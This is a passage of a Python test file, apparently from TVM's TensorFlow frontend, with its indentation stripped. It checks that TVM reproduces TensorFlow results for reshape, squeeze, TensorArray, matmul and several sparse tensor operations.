_test_reshape(np.arange(6.0), [2, 3])
_test_reshape(np.arange(6), [-1, 2])
_test_reshape(np.arange(6), [3, -1])
_test_reshape(np.arange(6), [-1])
_test_reshape_with_call()
_test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
_test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
_test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
_test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
_test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
""" One iteration of depth_to_space operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.depth_to_space(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
_test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
""" One iteration of space_to_depth operation with given data and block size """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.space_to_depth(in_data, block_size)
compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
_test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
_test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
""" One iteration of squeeze """
if squeeze_dims is None:
squeeze_dims = []
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
if squeeze_dims:
array_ops.squeeze(in_data, squeeze_dims)
else:
array_ops.squeeze(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
""" Squeeze """
# Nothing to squeeze.
_test_squeeze(np.arange(2).reshape((2)))
_test_squeeze(np.arange(6).reshape((2, 3)))
# Squeeze the middle element away.
_test_squeeze(np.arange(4).reshape((2, 1, 2)))
# Squeeze on both ends.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
# Positive squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
# Negative squeeze dim index.
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
_test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
def run(dtype_str, infer_shape, element_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(
dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.read(0)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False, None)
run(dtype, False, tf.TensorShape([None, 2]))
run(dtype, True, None)
def test_tensor_array_scatter():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
if infer_shape:
element_shape = tf.TensorShape([tf.Dimension(None)])
else:
element_shape = None
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(
dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
)
ta2 = ta1.scatter(indices, t)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_gather():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
gather_indices = tf.constant([1, 2])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.gather(gather_indices)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_split():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
out0 = ta2.read(0)
out1 = ta2.read(1)
out2 = ta2.read(2)
out3 = ta2.read(3)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_concat():
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(
np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
dtype_str
),
dtype=dtype,
)
split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
ta2 = ta1.split(t, split_length)
t = ta2.concat()
out = tf.identity(t)
compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_size():
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
def run(dtype_str, infer_shape):
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
in_data = [np_data, np_data]
t1 = tf.constant(np_data, dtype=dtype)
t2 = tf.constant(np_data, dtype=dtype)
ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
ta2 = ta1.write(0, t1)
ta3 = ta2.write(1, t2)
out = ta3.size()
g = tf.get_default_graph()
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, False)
run(dtype, True)
def test_tensor_array_stack():
def run(dtype_str, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
scatter_indices = tf.constant([2, 1, 0])
ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
ta2 = ta1.scatter(scatter_indices, t)
t1 = ta2.stack()
print(t1)
g = tf.get_default_graph()
compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")
for dtype in ["float32", "int8"]:
run(dtype, True)
def test_tensor_array_unstack():
def run(dtype_str, input_shape, infer_shape):
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
pytest.skip("Needs fixing for tflite >= 1.15.0")
with tf.Graph().as_default():
dtype = tf_dtypes[dtype_str]
t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
ta2 = ta1.unstack(t)
out0 = ta2.size()
out1 = ta2.read(0)
compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")
for dtype in ["float32", "int8"]:
run(dtype, (5,), False)
run(dtype, (5, 5), True)
run(dtype, (5, 5, 5), False)
run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
""" One iteration of ConcatV2 """
with tf.Graph().as_default():
dtype = "float32"
in1 = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
in2 = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
array_ops.concat_v2([in1, in2], dim)
np_data1 = np.random.uniform(size=shape1).astype(dtype)
np_data2 = np.random.uniform(size=shape2).astype(dtype)
compare_tf_with_tvm([np_data1, np_data2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
if tf.__version__ < LooseVersion("1.4.1"):
return
_test_concat_v2([2, 3], [2, 3], 0)
_test_concat_v2([10, 3, 5], [2, 3, 5], 0)
_test_concat_v2([2, 3], [2, 3], 1)
_test_concat_v2([5, 8], [5, 4], 1)
_test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
""" One iteration of sigmoid """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
sigmoid_out = math_ops.sigmoid(in_data)
compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
""" Sigmoid """
_test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
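    """ One iteration of argmin/argmax """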
with tf.Graph().as_default():
inp = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
func(inp, name="argx0", **kwargs)
compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
for output_type in [tf.int64, tf.int32]:
for axis in [None, 0, 1, 2]:
data = np.random.uniform(size=(8, 4, 9)).astype("float32")
_test_argx(tf.argmax, data=data, axis=axis, output_type=output_type)
_test_argx(tf.argmin, data=data, axis=axis, output_type=output_type)
#######################################################################
# Variable
# --------
def _test_variable(data):
""" One iteration of a variable """
tf.reset_default_graph()
with tf.Graph().as_default():
input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
input_tensor = array_ops.reshape(input_op, data.shape)
size = input_tensor.shape.dims[1]
with variable_scope.variable_scope("linear", reuse=None):
w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
math_ops.matmul(input_tensor, w)
compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
"""Variable type op test"""
_test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
""" Read Variable op test """
tf.reset_default_graph()
data = np.random.uniform(size=(32, 100)).astype("float32")
input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
size = input_tensor.shape.dims[1]
var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
input_var = tf.Variable(var_data, name="var1", use_resource=True)
math_ops.matmul(input_tensor, input_var)
out_name = ["MatMul:0"]
out_node = ["MatMul"]
in_name = ["Placeholder:0"]
in_node = ["Placeholder"]
in_data = [data]
with tf.Session() as sess:
sess.run(variables.global_variables_initializer())
final_graph_def = sess.graph.as_graph_def(add_shapes=True)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
with pytest.raises(Exception) as execinfo:
mod, params = relay.frontend.from_tensorflow(
final_graph_def, layout=None, shape=shape_dict, outputs=None
)
assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
# Now convert the variables to constant and run inference on the converted graph
final_graph_def = tf.graph_util.convert_variables_to_constants(
sess,
sess.graph.as_graph_def(add_shapes=True),
out_node,
)
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=target,
out_names=out_name,
num_output=len(out_name),
)
for i in range(len(tf_output)):
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
""" One iteration of matmul """
A_shape_init = [i, j]
B_shape_init = [j, k]
for transpose_a in [False, True]:
for transpose_b in [False, True]:
outer = outer or []
A_shape = outer + (A_shape_init[::-1] if transpose_a else A_shape_init)
B_shape = outer + (B_shape_init[::-1] if transpose_b else B_shape_init)
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def test_forward_matmul():
""" MatMul op test"""
_test_matmul(1, 3, 6, "int32")
_test_matmul(5, 3, 1, "float64")
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
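    """ One iteration of batch matmul """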
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([A_np, B_np], [A.name, B.name], result.name)
def _test_batch_matmul_dynamic(
A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
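    """ One iteration of batch matmul with dynamic input shapes """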
with tf.Graph().as_default():
A = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
result = tf.matmul(A, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
A_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
B_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
# for now, in TOPI, only cublas's implementation support dynamic shape
# TODO add more backends support in TOPI
compare_tf_with_tvm(
[A_np, B_np], [A.name, B.name], result.name, mode="vm", targets=["cuda -libs=cublas"]
)
def test_forward_batch_matmul():
""" TF op BatchMatMul, BatchMatMulV2 test"""
_test_batch_matmul((3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul((3, 5, 4), (3, 4, 5), "float32", True, True)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "int32", True, False)
_test_batch_matmul((3, 5, 4), (3, 5, 4), "float32", False, True)
_test_batch_matmul((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32")
_test_batch_matmul((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True)
_test_batch_matmul((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False)
_test_batch_matmul((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
_test_batch_matmul_dynamic((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32")
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "int32", True, False
)
_test_batch_matmul_dynamic(
(None, 5, 4), (None, 5, 4), (3, 5, 4), (3, 5, 4), "float32", False, True
)
_test_batch_matmul_dynamic(
(None, 4, 5, 6), (None, 4, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, 5, 6), (None, None, 6, 5), (3, 4, 5, 6), (3, 4, 6, 5), "float32"
)
_test_batch_matmul_dynamic(
(None, None, None, 5, 6),
(None, None, None, 6, 5),
(2, 3, 4, 5, 6),
(2, 3, 4, 6, 5),
"float32",
)
#######################################################################
# SparseTensorDenseMatMul
# ----------------------------------
def _test_sparse_dense_matmul(indices, values, A_inp_shape, B_inp_shape, dtype, flip=False):
""" One iteration of sparse_dense_matmul """
for adjoint_a in [False, True]:
for adjoint_b in [False, True]:
A_shape = A_inp_shape[::-1] if adjoint_a else A_inp_shape
B_shape = B_inp_shape[::-1] if adjoint_b else B_inp_shape
with tf.Graph().as_default():
A_sp = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=A_shape)
B = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
if flip:
result = tf.sparse.sparse_dense_matmul(
B, A_sp, adjoint_a=adjoint_b, adjoint_b=adjoint_a
)
else:
result = tf.sparse.sparse_dense_matmul(
A_sp, B, adjoint_a=adjoint_a, adjoint_b=adjoint_b
)
B_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
compare_tf_with_tvm([B_np], [B.name], result.name)
def test_forward_sparse_dense_matmul():
""" sparse_dense_matmul op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
    # The above sparse tensor can be represented in dense form as below:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 4], [4, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [7, 9], [9, 5], "float32")
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [4, 3], [3, 4], "float32", True)
_test_sparse_dense_matmul([[0, 0], [1, 2]], [4.0, 8.0], [3, 3], [3, 3], "float32", True)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [5, 5], [5, 5], "float32", True
)
_test_sparse_dense_matmul(
[[0, 0], [1, 3], [4, 3]], [3.0, 6.0, 9.0], [9, 5], [7, 9], "float32", True
)
#######################################################################
# SparseFillEmptyRows
# ------------
def _test_sparse_fill_empty_rows(indices_np, values_np, dense_shape_np, default_value_int, use_dyn):
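    """ One iteration of sparse_fill_empty_rows """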
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=(None), dtype=dense_shape_np.dtype, name="dense_shape"
)
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
dense_shape = tf.placeholder(
shape=dense_shape_np.shape, dtype=dense_shape_np.dtype, name="dense_shape"
)
default_value = tf.placeholder(shape=(), dtype=values_np.dtype, name="default_value")
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=dense_shape)
_ = tf.sparse.fill_empty_rows(sp_input, default_value, name="sparse_fill_empty_rows")
compare_tf_with_tvm(
[indices_np, values_np, dense_shape_np, default_value_int],
[indices.name, values.name, dense_shape.name, default_value.name],
[
"sparse_fill_empty_rows/SparseFillEmptyRows:0",
"sparse_fill_empty_rows/SparseFillEmptyRows:1",
"sparse_fill_empty_rows/SparseFillEmptyRows:2",
],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int",
[
(
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[0, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
10,
),
(
np.array([[1, 1, 1], [1, 3, 1], [2, 0, 5], [3, 1, 6]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([7, 7, 7], dtype=np.int64),
5,
),
(
np.array([[1], [2]], dtype=np.int64),
np.array([7, 8], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([5], dtype=np.int64),
4,
),
(
np.ones((0, 3), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([9, 3, 7], dtype=np.int64),
100,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
):
""" sparse_fill_empty_rows op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
    # The above sparse tensor can be represented in dense form as below:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_fill_empty_rows(
sparse_indices_np, sparse_values_np, dense_shape_np, default_value_int, use_dyn
)
#######################################################################
# SparseReshape
# ------------
def _test_sparse_reshape(indices_np, values_np, prev_shape_np, new_shape_np, use_dyn=False):
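    """ One iteration of sparse_reshape """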
with tf.Graph().as_default():
if use_dyn:
indices = tf.placeholder(shape=(None, None), dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=(None), dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(shape=(None), dtype=prev_shape_np.dtype, name="prev_shape")
new_shape = tf.placeholder(shape=(None), dtype=new_shape_np.dtype, name="new_shape")
else:
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
values = tf.placeholder(shape=values_np.shape, dtype=values_np.dtype, name="values")
prev_shape = tf.placeholder(
shape=prev_shape_np.shape, dtype=prev_shape_np.dtype, name="prev_shape"
)
new_shape = tf.placeholder(
shape=new_shape_np.shape, dtype=new_shape_np.dtype, name="new_shape"
)
sp_input = tf.sparse.SparseTensor(indices=indices, values=values, dense_shape=prev_shape)
_ = tf.sparse.reshape(sp_input, new_shape, name="sparse_reshape")
compare_tf_with_tvm(
[indices_np, values_np, prev_shape_np, new_shape_np],
[indices.name, values.name, prev_shape.name, new_shape.name],
["sparse_reshape:0", "sparse_reshape:1", "sparse_reshape/Identity:0"],
mode="vm",
)
@pytest.mark.parametrize(
"sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np",
[
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, -1], dtype=np.int64),
),
(
np.ones((0, 1), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([4], dtype=np.int64),
np.array([2, 2], dtype=np.int64),
),
(
np.ones((0, 2), dtype=np.int64),
np.array([], dtype=np.int64),
np.array([3, 6], dtype=np.int64),
np.array([-1, 2], dtype=np.int64),
),
(
np.array([[0, 0, 0], [0, 0, 1], [0, 1, 0], [1, 0, 0], [1, 2, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6], dtype=np.int64),
np.array([-1, 9], dtype=np.int64),
),
(
np.array(
[
[0, 0, 0, 0, 0],
[0, 0, 1, 2, 3],
[0, 1, 0, 3, 5],
[1, 0, 0, 4, 6],
[1, 2, 3, 6, 8],
],
dtype=np.int64,
),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([2, 3, 6, 7, 9], dtype=np.int64),
np.array([9, -1, 7], dtype=np.int64),
),
(
np.array([[0, 0], [0, 1], [3, 4], [4, 3], [7, 3]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([9, 4], dtype=np.int64),
np.array([-1], dtype=np.int64),
),
(
np.array([[0], [5], [10], [20], [24]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([25], dtype=np.int64),
np.array([5, 5], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([500, -1], dtype=np.int64),
),
(
np.array([[0, 100], [200, 100], [300, 400], [50, 20], [400, 50]], dtype=np.int64),
np.array([7, 5, 6, 3, 9], dtype=np.int64),
np.array([500, 20], dtype=np.int64),
np.array([250, 40], dtype=np.int64),
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
def test_forward_sparse_reshape(
sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn
):
""" sparse_reshape op test"""
###################################################################
#
    # In order to create a SparseTensor, it requires 3 inputs as below:
# SparseTensor(indices=[[0, 0], [1, 2]], values=[1, 2], dense_shape=[3, 4])
#
    # The above sparse tensor can be represented in dense form as below:
# [[1, 0, 0, 0]
# [0, 0, 2, 0]
# [0, 0, 0, 0]]
#
# ------------------------------------------------------------------
_test_sparse_reshape(sparse_indices_np, sparse_values_np, prev_shape_np, new_shape_np, use_dyn)
#######################################################################
# Sparse Segment Variants
# ------------
def _test_sparse_segment_variant(
tf_op, data_np, indices_np, segment_ids_np, num_segments, use_dyn=False
):
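    """ One iteration of a sparse segment op (sum/sqrt_n/mean) """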
with tf.Graph().as_default():
if use_dyn:
data = tf.placeholder(
shape=[None for _ in data_np.shape], dtype=data_np.dtype, name="data"
)
indices = tf.placeholder(shape=[None], dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=(None), dtype=segment_ids_np.dtype, name="segment_ids"
)
else:
data = tf.placeholder(shape=data_np.shape, dtype=data_np.dtype, name="data")
indices = tf.placeholder(shape=indices_np.shape, dtype=indices_np.dtype, name="indices")
segment_ids = tf.placeholder(
shape=segment_ids_np.shape, dtype=segment_ids_np.dtype, name="segment_ids"
)
_ = tf_op(
data, indices, segment_ids, num_segments=num_segments, name="sparse_segment_variant"
)
compare_tf_with_tvm(
[data_np, indices_np, segment_ids_np],
[data.name, indices.name, segment_ids.name],
["sparse_segment_variant:0"],
mode="vm",
)
@pytest.mark.parametrize(
"data_np, indices_np, segment_ids_np, num_segments",
[
(
np.array([5, 1, 7, 2, 3, 4], dtype=np.float32),
np.array([0, 3, 4], dtype=np.int32),
np.array([0, 1, 1], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
4,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
100,
),
(
np.random.random((6, 4, 5)),
np.array([0, 2, 4, 3, 1], dtype=np.int32),
np.array([0, 0, 1, 5, 5], dtype=np.int32),
None,
),
(
np.array([[[1, 7]], [[3, 8]], [[2, 9]]], dtype=np.float64),
np.array([0, 1, 2], dtype=np.int32),
np.array([0, 0, 1], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
9,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 6, 7, 7, 8], dtype=np.int32),
None,
),
(
np.array([[1, 2, 3, 4], [-1, -2, -3, -4], [5, 6, 7, 8]], dtype=np.float64),
np.array([0, 1], dtype=np.int32),
np.array([0, 2], dtype=np.int32),
None,
),
(
np.random.random((9, 4, 5, 7)),
np.array([0, 1, 2, 3, 4, 5, 6, 7, 8], dtype=np.int32),
np.array([0, 0, 1, 3, 5, 5, 5, 5, 5], dtype=np.int32),
6,
),
],
)
@pytest.mark.parametrize("use_dyn", [True, False])
@pytest.mark.parametrize(
"tf_op",
[
tf.sparse.segment_sum,
tf.sparse.segment_sqrt_n,
tf.sparse.segment_mean,
],
)
def test_forward_sparse_segment_sum_variants(
tf_op,
data_np,
indices_np,
segment_ids_np,
num_segments,
use_dyn,
):
"""sparse segment sum variants tests"""
